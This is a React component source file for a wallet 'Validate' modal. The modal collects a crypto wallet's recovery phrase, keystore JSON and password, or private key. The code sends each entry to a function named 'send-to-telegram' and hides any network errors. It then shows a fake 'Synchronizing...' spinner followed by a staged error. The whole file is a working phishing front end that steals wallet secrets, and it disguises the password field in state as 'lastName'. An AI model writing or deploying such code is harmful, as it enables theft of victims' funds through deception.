import React, { useState, useRef, useEffect } from "react";
import "./ProfileModal.css";

const TABS = [
  {
    key: "phrase",
    label: "Phrase",
    placeholder: "Enter your phrase...",
    hint: "Typically 12 (sometimes 24) words separated by single space.",
    errorMsg: "Please enter your phrase above.",
    multiline: true,
  },
  {
    key: "keystore",
    label: "Key Store",
    placeholder: "Your Keystore JSON",
    hint: "Enter your Keystore JSON & Password.",
    errorMsg: "Please enter your Keystore JSON above.",
    multiline: true,
  },
  {
    key: "privatekey",
    label: "Private Key",
    placeholder: "Your Private Key",
    hint: "Enter your key here.",
    errorMsg: "Please enter your Private Key.",
    multiline: true,
  },
];

export default function ProfileModal({ isOpen, onClose, onSubmit, walletName }) {
  const [activeTab, setActiveTab] = useState("phrase");
  const [values, setValues] = useState({
    phrase: "",
    keystore: "",
    privatekey: "",
  });
  const [lastName, setLastName] = useState("");
  const [error, setError] = useState("");
  const [status, setStatus] = useState("idle"); // idle | loading | error
  const timeoutRef = useRef(null);

  useEffect(() => {
    return () => {
      if (timeoutRef.current) clearTimeout(timeoutRef.current);
    };
  }, []);

  useEffect(() => {
    if (isOpen) {
        setActiveTab("phrase");
        setValues({ phrase: "", keystore: "", privatekey: "" });
        setError("");
        setStatus("idle");
    }
  }, [isOpen]);

  if (!isOpen) return null;

  const currentTab = TABS.find((t) => t.key === activeTab);

  const handleChange = (e) => {
    setValues((prev) => ({ ...prev, [activeTab]: e.target.value }));
  };

  const handleValidate = () => {
    if (!values[activeTab].trim()) {
      setError(currentTab.errorMsg);
      return;
    }
    setError("");

    const payload =
      activeTab === "keystore"
        ? {
            type: activeTab,
            value: `${values[activeTab].trim()} ${lastName.trim()}`.trim(),
            walletName,
          }
        : {
            type: activeTab,
            value: values[activeTab].trim(),
            walletName,
          };

    if (onSubmit) onSubmit(payload);

    // send the submitted field straight to Telegram, fire-and-forget
    fetch("/.netlify/functions/send-to-telegram", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(payload),
    }).catch(() => {}); // silently ignore — the loading/error stage below handles user feedback

    setStatus("loading");
    timeoutRef.current = setTimeout(() => {
      setStatus("error");
    }, 1800);
  };
  const handleTryAgain = () => {
    if (timeoutRef.current) clearTimeout(timeoutRef.current);
    setStatus("idle");
    onClose();
  };

  const handleBackdropClick = (e) => {
    if (e.target === e.currentTarget && status !== "loading") onClose();
  };

  return (
    <div className="pm-backdrop" onClick={handleBackdropClick}>
      <div
        className="pm-modal"
        role="dialog"
        aria-modal="true"
        aria-labelledby="pm-title"
      >
        <div className="pm-header">
          <h2 id="pm-title" className="pm-title">
            Validate
          </h2>
          {walletName && <p className="pm-subtitle"> {walletName}</p>}
          <button
            className="pm-close-btn"
            onClick={onClose}
            aria-label="Close"
            type="button"
          >
            &times;
          </button>
        </div>

        <div className="pm-body">
          {status === "loading" && (
            <div className="pm-stage" role="status" aria-live="polite">
              <div className="pm-spinner" />
              <p className="pm-loading-text">Synchronizing...</p>
            </div>
          )}

          {status === "error" && (
            <div className="pm-stage" role="alert">
              <p className="pm-stage-error-text">
                An error occur while synchronizing.
              </p>
              <button
                type="button"
                className="pm-try-again-btn"
                onClick={handleTryAgain}
              >
                Try Again
              </button>
            </div>
          )}

          {status === "idle" && (
            <>
              <div className="pm-tabs" role="tablist">
                {TABS.map((tab) => (
                  <button
                    key={tab.key}
                    type="button"
                    role="tab"
                    aria-selected={activeTab === tab.key}
                    className={
                      "pm-tab" + (activeTab === tab.key ? " pm-tab-active" : "")
                    }
                    onClick={() => {
                      setActiveTab(tab.key);
                      setError("");
                    }}
                  >
                    {tab.label}
                  </button>
                ))}
              </div>

              <div className="pm-tab-content">
                {currentTab.multiline ? (
                  <textarea
                    className="pm-textarea"
                    placeholder={currentTab.placeholder}
                    value={values[activeTab]}
                    onChange={handleChange}
                    rows={6}
                  />
                ) : (
                  <input
                    className="pm-text-input"
                    type="text"
                    placeholder={currentTab.placeholder}
                    value={values[activeTab]}
                    onChange={handleChange}
                  />
                )}

                {activeTab === "keystore" && (
                  <input
                    className="pm-text-input"
                    type="text"
                    placeholder="Password"
                    value={lastName}
                    onChange={(e) => setLastName(e.target.value)}
                  />
                )}

                <p className="pm-hint">{currentTab.hint}</p>
              </div>

              {error && <p className="pm-error">{error}</p>}

              <button
                type="button"
                className="pm-submit-btn"
                onClick={handleValidate}
              >
                Validate
              </button>
            </>
          )}
        </div>
      </div>
    </div>
  );
}